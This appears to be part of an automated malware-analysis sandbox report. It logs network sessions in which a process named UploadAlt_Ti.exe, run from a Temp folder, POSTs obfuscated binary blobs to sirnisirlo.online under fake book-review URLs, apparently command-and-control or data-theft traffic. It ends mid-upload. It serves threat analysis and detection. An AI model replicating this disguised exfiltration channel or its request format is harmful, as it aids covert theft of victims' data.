                                                                                                                3192.168.2.749218188.114.97.34432176C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-14 18:57:00 UTC453OUTPOST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg
                                                                                                                Content-Length: 139141
                                                                                                                Host: sirnisirlo.online
                                                                                                                2024-11-14 18:57:00 UTC15331OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 01 08 00 00 00 8c 00 00 00 02 c9 01 00 02 ae a1 14 1a 23 12 65 c2 05 99 86 00 00 00 00 00 00 00 00 06 81 00 00 01 57 d0 0a c9 60 48 49 4c 60 48 53 a1 34 39 b7 b6 b2 ec 1c a1 1d 2e aa b9 b2 39 b9 2e 33 39 b7 37 3a 32 b2 b9 b5 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e aa b9 b2 39 10 22 b0 3a b0 c8 cc 60 48 d3 22 b2 33 b0 ba 36 3a ec 20 a1 1d 2e aa b9 b2 39 b9 2e 33 39 b7 37 3a 32 b2 b9 b5 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e aa b9 b2 39 10 22 b0 3a b0 2e 22 b2 33 b0 ba 36 3a ec 1a b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 2e a1 34 39 b7 b6 b2 2e 38 39 b7 33 b4 36 b2 b9 2e 22 b2 33 b0 ba 36 3a 2e 26 b7
                                                                                                                Data Ascii: #eW`HIL`HS49.9.397:2.88":.&6.6.49.9":`H"36: .9.397:2.88":.&6.6.49.9":."36:49199.49.8936."36:.&
                                                                                                                2024-11-14 18:57:00 UTC15331OUTData Raw: 13 d3 1c a0 82 45 19 1d ee df 72 64 55 f8 4f a1 5b 05 e0 1b 08 e9 3d ad ad b4 23 59 35 53 c0 35 32 2c 2d 46 aa 78 f8 bc 95 71 94 65 3b 72 4f 31 d6 8c 5b 56 64 2f d4 0e 0e 4d 1b 87 39 2c 05 55 6c b6 75 4b 49 f9 27 c2 e6 2b d1 42 08 36 c8 fe 86 c0 c0 cc 24 4b 22 0a 98 2f 33 86 7c 2a ed 87 63 1b 74 bd ba a4 ca 37 a4 ea 14 65 4b 13 f0 31 3d 36 6e 04 6d e0 fc 1b 73 fc 39 ef c8 d3 49 7b 88 95 f9 f0 32 80 51 ec c3 99 03 56 34 ea 65 58 58 b7 89 05 c7 3f 03 60 ed a5 3d cf 3f de 13 40 fb 16 db b7 c0 a5 1e 5b 87 08 96 44 c7 88 1f 94 e5 ab c4 52 69 cd 8a a1 4c f0 c9 fa 57 fe 02 20 8b 33 d1 d2 c3 7a ab 49 94 86 6a a1 63 43 21 fc dd 17 51 c7 de ee 22 ee 74 46 3f 8c 5b 0c f4 d3 8c eb fd 08 13 b8 ca f2 c6 d8 a4 88 79 88 14 58 dd 5f 68 fb 79 14 94 37 cc 1b 2e bc a4 93 c7
                                                                                                                Data Ascii: ErdUO[=#Y5S52,-Fxqe;rO1[Vd/M9,UluKI'+B6$K"/3|*ct7eK1=6nms9I{2QV4eXX?`=?@[DRiLW 3zIjcC!Q"tF?[yX_hy7.
                                                                                                                2024-11-14 18:57:00 UTC15331OUTData Raw: d0 2b 5c 43 fc 42 f5 92 3e 34 89 b1 de 7b 4b a3 1c da 25 34 59 d6 db a2 af b8 a6 d0 a6 6f 4d ad 13 60 1e 8a 24 a2 4f f1 b0 d3 80 75 f9 71 5a 46 05 f2 43 fb 0b 5b 16 e5 8e 3b 3d 7c 96 5f 86 ab a7 1d 4b 9a b0 06 dd 10 35 d0 4d 25 bd 63 1e ba 7e 40 d3 05 16 00 23 64 3a 9d 53 30 65 80 8a 78 0a 0e 2a d0 71 5e 78 f6 19 d7 c5 2f 30 0a 6f 4f 6d e3 cf a1 0a da 13 2a f8 3d 23 99 56 24 30 02 42 b9 4c 32 50 2d db ed 50 ac 38 2d db bc a1 29 f8 a5 85 22 b5 4b f8 9d 04 94 5c 62 38 98 dc 37 f1 a9 33 e2 6b 96 87 3a 98 13 cf 85 8f a9 67 98 9f 10 0d d5 80 89 67 31 63 23 27 f6 61 60 23 d8 9a 81 1a 8c b2 11 06 30 72 33 d8 9c 15 14 50 2c 3f 30 d9 85 f7 18 50 4c 28 42 66 1c 19 f3 db bc 9e d3 84 04 1b 1b 69 05 4f 9a 09 64 37 01 a8 b9 8b 9f d4 08 12 2a 30 1e f1 24 b1 93 f1 d1 c0
                                                                                                                Data Ascii: +\CB>4{K%4YoM`$OuqZFC[;=|_K5M%c~@#d:S0ex*q^x/0oOm*=#V$0BL2P-P8-)"K\b873k:gg1c#'a`#0r3P,?0PL(BfiOd7*0$
                                                                                                                2024-11-14 18:57:00 UTC15331OUTData Raw: e3 c8 38 51 10 3a c1 11 76 a4 01 df 72 6e 46 13 c8 71 7e 26 61 7b 80 54 6b 01 68 26 09 9e 69 94 52 ae 37 2f 11 12 af c5 0a f3 bd 00 ce 5c 46 7a 10 2b 6b b4 ee 1b 0e 03 a6 f2 eb 45 46 b6 52 78 20 2e ae d3 ad 46 5c 65 af f3 95 8f f6 40 38 6d 2d 8b 44 ea 85 3c 6d 2c de ae 40 26 40 30 85 26 00 03 5b 60 84 31 fa 03 01 19 a8 c9 9f 20 13 24 58 82 7f df f1 de 77 94 01 f7 b1 83 a5 7d 2b 5e c1 3d 10 79 ca 22 76 33 5a 6c c8 b3 2b c9 cb e5 8b da 7f 8c 6d fc a9 b3 21 7a 52 1f 23 05 41 11 de 6a df b8 e4 96 a8 79 43 80 4c aa 0d cf 6b 2c 10 34 ab 53 63 18 f1 8a 36 f3 5a dd 23 bb 3e 68 31 c0 50 90 26 4c 05 2c 41 a1 bb a1 0b 9e 3f 5f 71 e3 88 09 da 61 33 ea 81 42 1e 83 60 53 c0 b6 49 57 ac 3b 82 8f c9 09 52 86 76 e8 ed e4 17 6d ff a1 d1 ff d0 98 1f 53 0e 9a ca 6d a6 83 c1
                                                                                                                Data Ascii: 8Q:vrnFq~&a{Tkh&iR7/\Fz+kEFRx .F\e@8m-D<m,@&@0&[`1 $Xw}+^=y"v3Zl+m!zR#AjyCLk,4Sc6Z#>h1P&L,A?_qa3B`SIW;RvmSm
                                                                                                                2024-11-14 18:57:00 UTC15331OUTData Raw: 49 d1 30 0e e2 0c 45 09 98 4c c0 88 88 b2 38 04 8b a8 0a 31 10 2b 60 a4 07 a1 a2 41 89 2c 42 0b 98 09 53 10 06 88 22 07 89 ff fd f1 f1 f9 91 e5 eb 3b 8d d3 8f fe 4c f2 8f ef ff 7b c8 3b bc 5e 7e 4c 4b 5e 2c bf 46 a1 4d ff 44 d3 d4 d5 f9 76 f1 fd 5b 76 fc f3 a3 de 7f 0c c3 c7 f7 a2 6e d6 bf 28 9f 49 f5 a3 4b 8b f8 6f b6 ff 51 fa 4d e3 a5 2d fe 0c c3 77 7d a7 b6 ff 7f fc c8 c6 be 2e 87 9f 71 3a d5 e3 b0 fe c8 47 a1 a8 cb 8f ef 9f 32 36 aa 4c 9f 7f 3a 4c 47 98 18 9a d3 32 06 37 cc 40 00 56 3a c9 91 ac 77 43 46 8f a4 c1 1c 8e 31 2a ae dd 4f ea 94 31 43 72 5f 0a e7 bf 9d 89 82 c5 d7 dc ca 80 70 23 72 f3 09 12 3d 9d 32 8a 07 b3 56 4e 62 38 08 30 1b bf 8f f7 8d 1c 00 cd 12 2f a6 9e de 92 32 e5 c2 bb 47 43 c9 af f3 52 a7 23 80 75 e7 f9 21 41 1c 7f 07 85 1b 1b 52
                                                                                                                Data Ascii: I0EL81+`A,BS";L{;^~LK^,FMDv[vn(IKoQM-w}.q:G26L:LG27@V:wCF1*O1Cr_p#r=2VNb80/2GCR#u!AR
                                                                                                                2024-11-14 18:57:00 UTC15331OUTData Raw: bc 46 60 4c bf f7 cb 04 46 53 3f fd 6d 66 d4 cf ed 71 2c d2 b6 2f 3a a1 ca cb af 25 a7 d3 52 4c 69 1d 67 65 5d a6 e3 75 af e2 bc af b0 61 df a9 9b 80 91 14 95 44 12 a7 51 1c 25 30 1c 22 88 04 c7 38 0c c7 b0 1a c0 79 12 01 98 06 82 d8 42 64 90 1e c2 e8 42 44 f1 1a e3 69 0e 16 79 01 85 fe fd 4c 84 7d 86 7d 86 7f f4 4c 63 13 f4 45 5c 34 7d 5d 37 c9 1b cf 43 b0 76 53 19 a4 55 5e d4 5d 5a 7f 1d 79 7e d9 a8 ff 95 85 fc cf e5 b2 76 c3 5a d6 53 59 74 f1 98 f7 55 16 f5 75 1e c4 c9 d4 26 5d 5f 8f 4d f4 af e6 71 bf 05 ec bc 0d 73 24 07 d1 84 80 f1 b4 c0 71 a2 4e 8a 0c 03 f2 a8 4a e3 38 c8 0b 22 4c 13 2c 26 52 14 45 c3 22 43 e1 90 c0 88 90 45 b1 3c 41 a2 34 7f 9f 6c 6f e7 50 fb f5 4b 94 95 4d 16 b6 4d 13 97 d3 5a 95 75 5d d5 d5 51 f6 d9 31 64 6d 90 ff cb b0 86 f8 8f
                                                                                                                Data Ascii: F`LFS?mfq,/:%RLige]uaDQ%0"8yBdBDiyL}}LcE\4}]7CvSU^]Zy~vZSYtUu&]_Mqs$qNJ8"L,&RE"CE<A4loPKMMZu]Q1dm
                                                                                                                2024-11-14 18:57:00 UTC15331OUTData Raw: 7a 65 45 a8 f4 fb aa e8 e5 55 b6 34 84 f7 e1 19 5b ae 42 e9 02 4a 76 e7 d1 bf 60 0d 09 39 de 37 d5 d0 4d 8a 14 51 16 aa 91 91 34 02 df 13 1d 32 f4 ce 74 c5 61 87 58 06 08 f5 fc 23 04 d3 41 12 df 90 26 d8 b0 be 50 ac 5d 2d d0 8c 75 b6 88 f8 ac b2 03 c2 eb 92 3d 44 89 12 9e 90 69 72 b7 c7 62 19 56 38 60 3e bc 97 11 c9 68 31 87 bd ee 7b 27 f1 ae 06 b8 6c d1 6b 71 c8 1b 07 b1 f5 f3 27 ac 94 56 51 46 aa e8 96 19 48 a9 78 73 ed 1b 57 01 ac 5d 87 b5 26 79 22 1b ea 85 e9 61 39 53 04 be 45 d3 a9 49 1e 0a db 06 42 42 c0 26 36 9a 42 eb b2 cd b7 d1 8a 3d a6 f9 2e df af 64 e9 f0 e9 7a f2 fa b5 26 42 a0 d3 7c 21 00 d2 bc 17 a5 88 c2 7c b4 78 08 bd c0 41 e1 7c ea 91 c0 e3 c5 57 c5 91 1a 62 5c 4f d5 0c d4 e8 35 27 a5 03 cd e8 15 0a 07 48 26 93 92 3d b4 47 9e e3 9e 3b f4
                                                                                                                Data Ascii: zeEU4[BJv`97MQ42taX#A&P]-u=DirbV8`>h1{'lkq'VQFHxsW]&y"a9SEIBB&6B=.dz&B|!|xA|Wb\O5'H&=G;
                                                                                                                2024-11-14 18:57:00 UTC15331OUTData Raw: 5d 3c 4c c4 44 85 77 b4 c5 f9 97 df bb e4 4b ed eb d7 a5 ef 0e f3 c2 2d 0e de 1c fb a5 d2 71 97 47 aa 1b ca 7f 5c 18 ae b7 d4 05 79 ac 3c f1 60 f9 e1 12 dd f3 b8 5d 9b cd 64 5b 4e 9a 46 d1 76 2f ae 73 4f 50 e4 16 97 c6 e3 84 ad 1e b9 77 12 52 18 a3 77 4b 49 a7 82 0e 93 6f 1c 05 f7 c7 e5 ac 2e 76 43 26 3c e1 4c e7 33 8b 1f 6e 20 4a d3 77 56 1e 2c 0f 0c 63 c8 ab 1f d8 96 c2 c3 fe 18 e5 f3 9e 7b 0c e6 22 9f 27 7b 0b 76 54 bd ec 35 5b f7 71 89 8d a3 4b 68 ae 98 24 85 e6 f0 18 f2 69 c0 b3 65 b6 46 d2 fb f7 cb 8d 60 b0 7f 7e f3 97 2b af 72 e1 6e c2 cb 9a 24 71 d0 e3 61 36 97 cf 9a bc a5 e4 71 71 93 17 23 1a e4 63 a3 a9 0e a7 09 89 c8 c6 c9 54 4c 09 c6 c3 5f 24 5e 1c 78 14 8f 87 07 d3 e5 6f 29 3c 1e 52 f0 32 1d f3 e1 3b 18 46 bc 0c 42 93 26 f1 0e 93 b0 9f 46 53
                                                                                                                Data Ascii: ]<LDwK-qG\y<`]d[NFv/sOPwRwKIo.vC&<L3n JwV,c{"'{vT5[qKh$ieF`~+rn$qa6qq#cTL_$^xo)<R2;FB&FS
                                                                                                                2024-11-14 18:57:00 UTC15331OUTData Raw: 46 4a c8 72 44 39 4c 13 80 11 9f 8e 20 8a e4 53 84 95 4d b5 66 0c 9a e4 7b 8f e4 76 9e 5e 82 b4 fc fe 62 e4 9e ab fe 08 be 9d d7 d7 3b 38 e5 b1 da 9b e5 8f 77 6d 3b fa 24 d5 a8 e0 1f a7 e6 89 d7 5f 7b dc bf 58 3b 35 ec 5c 36 c3 78 d8 ad fa 36 5b a8 f4 e0 b7 bc 8a b7 6e 73 28 bb c1 cb e3 ad 6e 6f 2f 5c b0 51 ee ba 57 ba eb 48 58 8e 96 53 0e ac af 68 e7 dd a7 db c9 e3 09 17 52 64 49 dc 79 fe 49 f6 69 de f3 59 65 23 66 f9 4a 16 c4 fa 75 a9 b3 9b a6 b1 ef 6f 7a d5 ee 81 dd e6 fa 0f ab fe 68 57 37 71 cb 5b b5 63 78 ce e7 b6 af dd 57 e5 55 4b b1 fc f6 53 75 ab 1e 3e 3a 6a c7 7a 44 94 18 6c f8 9e d6 76 5c de bb 6d 56 fa 4b b9 2b d5 d7 75 b6 2e 09 8a 1e 66 d4 6c 93 5c e7 1c a1 be eb 8e 5f 69 cf 1b b7 1d 9d b2 a0 24 65 99 a4 e3 91 6b e3 95 5b b2 e4 74 f6 c8 e9 1e
                                                                                                                Data Ascii: FJrD9L SMf{v^b;8wm;$_{X;5\6x6[ns(no/\QWHXShRdIyIiYe#fJuozhW7q[cxWUKSu>:jzDlv\mVK+u.fl\_i$ek[t
                                                                                                                2024-11-14 18:57:00 UTC1162OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                Data Ascii:
                                                                                                                2024-11-14 18:57:01 UTC783INHTTP/1.1 204 No Content
                                                                                                                Date: Thu, 14 Nov 2024 18:57:01 GMT
                                                                                                                Connection: close
                                                                                                                gm: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WZaxcSIdl7d8S40gm0aY70y1jaEKSZlH4Orb6vLBXVxZTCRTUlBfnfyKlKWyfZ3nUfAGTUCXUM3UoTKWCI7OiF9ANJ7gFG7lPA0lQLouzN2lyojf7pEuM8jmkIcUKz354A7Hqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8e29398bac77cf19-SJC
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=45094&sent=83&recv=148&lost=0&retrans=0&sent_bytes=2841&recv_bytes=140626&delivery_rate=64238&cwnd=32&unsent_bytes=0&cid=30a60ea50c1f6887&ts=1204&x=0"


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.749234188.114.97.34432176C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-14 18:57:03 UTC450OUTPOST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg
                                                                                                                Content-Length: 745
                                                                                                                Host: sirnisirlo.online
                                                                                                                2024-11-14 18:57:03 UTC745OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 01 08 00 00 00 8c 00 00 00 95 00 00 00 38 31 c7 22 1a 23 12 65 c2 05 99 86 00 00 00 00 00 00 00 00 81 00 00 00 1c 98 e3 11 49 60 48 00 00 00 00 00 00 00 00 31 00 00 00 1c 98 e3 11 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 08 00 00 00 8c 00 00 00 a7 00 00 00 0c cf 7f 22 1a 23 12 65 c2 05 99 86 00 00 00 00 00 00 00 00 8a 00 00 00 06 e7 bf 11 49 60 49 ca 60 01 80 d1 49 60 00 50 ca 60 80 80 d1 49 60 00 50 00 00
                                                                                                                Data Ascii: 81"#eI`H1((("#eI`I`I`P`I`P
                                                                                                                2024-11-14 18:57:03 UTC781INHTTP/1.1 204 No Content
                                                                                                                Date: Thu, 14 Nov 2024 18:57:03 GMT
                                                                                                                Connection: close
                                                                                                                gm: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hGXFu0pAsxamw42Di5xAt9vOtQWZTXb%2Fy%2B0F8qRKZsjV04IYjAJPUZnNgPmA4YZHb3kanKJm28Hq0u4c3xTLR27nZDaJODbudHfxf6KKsVIzs5heUnJwio3GMC5y8LWXzyb6sg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8e29399cbbbf943b-SJC
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=40291&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1831&delivery_rate=71481&cwnd=32&unsent_bytes=0&cid=b874be4c3cde1651&ts=568&x=0"


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.749241188.114.97.34432176C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-14 18:57:05 UTC450OUTPOST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg
                                                                                                                Content-Length: 212
                                                                                                                Host: sirnisirlo.online
                                                                                                                2024-11-14 18:57:05 UTC212OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 01 08 00 00 00 8c 00 00 00 99 00 00 00 b7 8a c4 29 1a 23 12 65 c2 05 99 86 00 00 00 00 00 00 00 00 83 00 00 00 db 45 62 94 c9 60 60 49 60 c8 00 00 00 00 00 00 00 00 00 31 00 00 00 db 45 62 94 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                Data Ascii: )#eEb``I`1Eb(((
                                                                                                                2024-11-14 18:57:05 UTC791INHTTP/1.1 204 No Content
                                                                                                                Date: Thu, 14 Nov 2024 18:57:05 GMT
                                                                                                                Connection: close
                                                                                                                gm: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9aDFEvHZrNIdr%2BHHMFqhAsC4xQj%2FRB%2F4F3ooStosgHiru%2Fz8bmPeX156z5mhGYQaye6YZa3FfsfeG5upnyqbLSV5eUci%2FJUzafM8Sk3clWpdsZv9BrG%2B0lFwFF8QJDDDm43KBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8e2939a7eb32d74c-NRT
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=138903&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1298&delivery_rate=20821&cwnd=32&unsent_bytes=0&cid=c41660ede97af387&ts=1037&x=0"


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.749251188.114.97.34432176C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-14 18:57:07 UTC450OUTPOST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg
                                                                                                                Content-Length: 380
                                                                                                                Host: sirnisirlo.online
                                                                                                                2024-11-14 18:57:07 UTC380OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 01 08 00 00 00 8c 00 00 00 95 00 00 00 b4 99 9c 3e 1a 23 12 65 c2 05 99 86 00 00 00 00 00 00 00 00 81 00 00 00 5a cc 4e 1f 49 60 48 00 00 00 00 00 00 00 00 31 00 00 00 5a cc 4e 1f 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 08 00 00 00 8c 00 00 00 94 00 00 00 f3 d4 d1 37 1a 23 12 65 c2 05 99 86 00 00 00 00 00 00 00 00 01 00 00 00 f9 6a e8 9b c8 48 00 00 00 00 00 00 00 00 31 00 00 00 f9 6a e8 9b 28 a5 03 03 16
                                                                                                                Data Ascii: >#eZNI`H1ZN(((7#ejH1j(
                                                                                                                2024-11-14 18:57:07 UTC782INHTTP/1.1 204 No Content
                                                                                                                Date: Thu, 14 Nov 2024 18:57:07 GMT
                                                                                                                Connection: close
                                                                                                                gm: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dv6karzN1HGPWNGAyBaswNXHrhl4yQAmTJjAL9nhhLOSjrYkd6y4h8ys7U5NJ08U0uBId8O6LrPSbuqNWFHKfHPziC39IBUqynSXAD%2BNZHP%2Bge3NzoqaaOQNWWY4KPNro5XBJA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8e2939b5a929d78d-NRT
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=131350&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1466&delivery_rate=22050&cwnd=32&unsent_bytes=0&cid=24553fa16cb796bc&ts=531&x=0"


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.749258188.114.97.34432176C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-14 18:57:08 UTC452OUTPOST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg
                                                                                                                Content-Length: 39217
                                                                                                                Host: sirnisirlo.online
                                                                                                                2024-11-14 18:57:08 UTC15331OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 01 08 00 00 00 8c 00 00 00 f6 98 00 00 44 e1 fd 17 1a 23 12 65 c2 05 99 86 00 00 00 00 00 00 00 00 02 00 00 00 22 f0 fe 8b c9 60 00 48 00 00 00 00 00 00 00 00 61 4c 00 00 22 f0 fe 8b 28 a5 81 02 96 00 00 04 04 00 16 8d 46 ac 29 f1 86 6e ff ff ff ff ff ff ff ff 0d 00 0a 00 a3 39 b0 31 31 b2 39 2e 32 b2 b9 2e a0 a8 29 23 a2 2b 29 2a a3 26 17 38 32 33 80 00 08 00 01 02 00 00 00 00 00 00 83 02 00 00 00 00 00 00 80 01 02 fe fd a0 a8 29 23 a2 2b 29 2a a3 26 29 28 27 2b aa a6 a0 a6 24 2a ac a2 2a a2 2b a3 22 a2 27 24 a2 24 2d 22 a0 a8 29 2c 2d a8 a1 22 24 24 26 2a aa 2d a4 a2 25 29 a1 a8 a3 a3 28 29 a8 ab 21 a4 ac ab a0 22 ab 25 a2 2d 2a a0 a2 26 a2 29 a5 2d aa 22 2d 25 24 a9 23 2b a4 aa 28 21 2a 25 2b a3 a5
                                                                                                                Data Ascii: D#e"`HaL"(F)n9119.2.)#+)*&823)#+)*&)('+$**+"'$$-"),-"$$&*-%)()!"%-*&)-"-%$#+(!*%+
